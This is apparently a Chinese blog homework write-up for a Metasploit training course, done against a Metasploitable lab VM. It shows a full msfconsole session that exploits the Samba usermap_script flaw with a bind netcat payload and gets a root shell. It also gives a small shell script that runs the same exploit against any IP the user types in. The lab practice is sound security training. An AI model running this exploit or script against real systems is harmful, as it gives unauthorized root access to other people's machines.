metsploit魔鬼训练营第一章作业

实验一:通过攻击samba服务漏洞控制linux靶机

目标ip:192.168.232.134

metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj

实验环境:kali linux

kalimsfconsole 

msf > use exploit/multi/samba/usermap_script 

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat

msf exploit(usermap_script) > show options 


Module options (exploit/multi/samba/usermap_script):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Payload options (cmd/unix/bind_netcat)

msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit 


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

Exploit target:


   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit 

[*] Started bind handler
[*] Command shell session 1 opened (192.168.232.129:34139 -> 192.168.232.134:4444) at 2017-06-04 03:17:57 -0400

whoami 
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

ok

实验二:

用msfcli命令编写shell脚本程序,实现用户只需要输入ip地址,即可使用usermap_script漏洞渗透攻击模块


msfcli已经被取代,建议使用msfconsole  -x

kali: vim  metasploit.shell

echo "请输入目标ip"

read ip
msfconsole -x "use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $ip;exploit"

kali:chomd a+x  metasploit.shell

kali:./metasploit







评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值